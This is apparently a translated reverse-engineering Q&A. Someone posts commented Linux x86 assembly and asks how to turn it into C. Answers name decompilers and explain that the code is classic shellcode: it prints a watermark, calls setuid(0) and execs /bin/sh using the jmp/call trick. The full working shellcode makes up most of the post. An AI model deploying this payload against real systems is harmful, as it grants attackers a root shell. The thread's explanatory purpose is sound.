将汇编代码转换为 c

逆向工程 拆卸 反编译 linux C 开发
2021-07-03 04:00:42

我在 Linux 发行版上有以下汇编代码:

# using the .data section for write permission
# instead of .text section
.section .data
.globl _start

_start:
     # displaying some characters for watermarking :-)
     xor %eax,%eax      # clear eax by setting eax to 0
     xor %ebx,%ebx      # clear ebx by setting ebx to 0
     xor %edx,%edx      # clear edx by setting edx to 0
     push %ebx          # push ebx into the stack, base pointer
                        # for the stack frame
     push $0xa696e55    # push U-n-i characters
     push $0x4d555544   # push M-U-U-D characters
     push $0x414d4841   # push A-M-H-A characters
     movl  %esp,%ecx    # move the sp to ecx
     movb  $0xf,%dl     # move 15 to dl (low d), it is the string length,
                        # notice the use of movb - move byte, this is to avoid null
     movb  $0x4,%al     # move 4 to al (low l),
                        # 4 is system call number for
                        # write(int fd, char *str, int len)
     int  $0x80         # call kernel/syscall

     # setuid(0)
     xor %eax,%eax      # clear eax by setting eax to 0
     xor %ebx,%ebx      # clear ebx by setting ebx to 0
     xor %ecx,%ecx      # clear ecx by setting ecx to 0
     movb $0x17,%al     # move 0x17 into al - setuid(0)
     int $0x80          # call kernel/syscall

     jmp do_call        # jump to get the address with the call trick

jmp_back:
     pop %ebx           # ebx (base pointer=stack frame pointer) has 
                        # the address of our string, use it to index
     xor %eax,%eax      # clear eax by setting eax to 0
     movb %al,7(%ebx)   # put a null at the N or shell[7]
     movl %ebx,8(%ebx)  # put the address of our string (in ebx) into shell[8]

     movl %eax,12(%ebx) # put the null at shell[12] our string now looks something like
                        # "/bin/sh\0(*ebx)(*0000)"
     xor %eax,%eax      # clear eax by setting eax to 0
     movb $11,%al       # put 11 which is execve

# syscall number into al
     leal 8(%ebx),%ecx  # put the address of XXXX i.e. (*ebx) into ecx
     leal 12(%ebx),%edx # put the address of YYYY i.e. (*0000) into edx
     int $0x80          # call kernel/syscall

do_call:
     call jmp_back

shell:
     .ascii "/bin/shNXXXXYYYY"

如何将其转换为 C 代码?

4个回答

这是您可能会发现有用的一些反编译工具/资源的列表。

你需要反编译器。我会编译它并使用可重定向反编译器 这是完成此特定任务的最简单方法。

我只想添加这段代码的实际作用,因为它相当简单。它旨在用作shellcode。比较标准的一款。它的作用是向 AHMADUMinU 写一些东西到 STDIN (?),它被打印在屏幕上,然后通过 syscall 11 继续执行 /bin/sh。它很容易理解,因为它被大量注释。我提到所有这些是因为您将无法在“反编译代码”中看到许多细节,这些细节看起来像这样:

main(){
write(0,"AHMA...",15);
execve("/bin/sh",NULL,NULL);
}

有一点很有趣(旧的 shellcoding 技巧)。shellcode 需要空终止“/bin/sh”字符串,该字符串将位于堆栈中的某个位置。为此,它需要获取其地址。它通过两次调用来实现。调用将创建新的堆栈帧,此时它可以弹出保存的堆栈帧。

还有asm2c可以处理汇编源代码而不是可执行文件或目标文件。

将 DOS 汇编代码转换为 C 代码的工具 Edit

其它你可能感兴趣的问题
上一篇销售洁净室工程产品是否合法? 下一篇如何查看传递给 RegOpenKeyEx 的参数,并设置条件断点?